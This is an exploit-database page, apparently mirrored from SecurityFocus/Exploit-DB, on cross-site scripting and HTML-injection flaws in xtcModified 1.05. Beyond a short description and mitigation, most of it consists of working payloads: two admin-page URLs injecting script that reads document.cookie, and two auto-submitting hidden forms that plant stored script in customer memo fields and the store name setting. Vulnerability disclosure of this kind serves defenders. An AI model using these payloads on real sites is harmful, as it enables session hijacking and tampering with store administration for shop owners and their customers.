header-logo
Suggest Exploit
vendor:
xtcModified
by:
SecurityFocus
7.5
CVSS
HIGH
Cross-site Scripting and HTML-Injection
79, 80
CWE
Product Name: xtcModified
Affected Version From: 01.05
Affected Version To: 01.05
Patch Exists: NO
Related CWE: N/A
CPE: a:xtcmodified:xtcmodified
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2012

xtcModified Multiple Cross-Site Scripting and HTML-Injection Vulnerabilities

xtcModified is prone to multiple cross-site scripting and HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input. Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.

Mitigation:

Input validation should be used to ensure that untrusted data is not used to generate unexpected results. Additionally, the application should be configured to use a secure transport layer such as HTTPS.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/46681/info

xtcModified is prone to multiple cross-site scripting and HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input.

Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.

xtcModified 1.05 is vulnerable; other versions may also be affected. 

Cross-site scripting:

http://www.example/admin/categories.php?search=prod"><script>alert(document.cookie)</script>
http://www.example/admin/orders.php?selected_box=customers"><script>alert(document.cookie)</script>&status=0

Html-injection:

1. 

<form action="http://www.example/admin/customers.php?cID=1&action=update" method="post" name="main">

<input type="hidden" name="default_address_id" value="1">
<input type="hidden" name="customers_gender" value="m">
<input type="hidden" name="csID" value="">
<input type="hidden" name="customers_firstname" value="FirstName">
<input type="hidden" name="customers_lastname" value="LName">
<input type="hidden" name="customers_dob" value="01/01/2007">
<input type="hidden" name="customers_email_address" value="email@example.com">
<input type="hidden" name="entry_company" value="company">
<input type="hidden" name="entry_password" value="mypass">
<input type="hidden" name="memo_title" value=&#039;mmtitle"><script>alert(document.cookie)</script>&#039;>
<input type="hidden" name="memo_text" value=&#039;txt"><script>alert(document.cookie)</script>&#039;>

</form>
<script>
document.main.submit();
</script>


2. 

<form action="http://www.example/admin/configuration.php?gID=1&action=save" method="post" name="main">

<input type="hidden" name="STORE_NAME" value=&#039;My Store"><script>alert(document.cookie)</script>&#039;>
<input type="hidden" name="STORE_OWNER" value="Owner">
<input type="hidden" name="STORE_OWNER_EMAIL_ADDRESS" value="email@example.com">
<input type="hidden" name="STORE_COUNTRY" value="81">
<input type="hidden" name="STORE_ZONE" value="80">
<input type="hidden" name="EXPECTED_PRODUCTS_SORT" value="desc">
<input type="hidden" name="EXPECTED_PRODUCTS_FIELD" value="date_expected">
<input type="hidden" name="DISPLAY_CART" value="true">
<input type="hidden" name="ADVANCED_SEARCH_DEFAULT_OPERATOR" value="and">
<input type="hidden" name="STORE_NAME_ADDRESS" value="address">
<input type="hidden" name="CURRENT_TEMPLATE" value="xtc5">
</form>
<script>
document.main.submit();
</script>

Navigation

Suggest Exploit

Services By CQR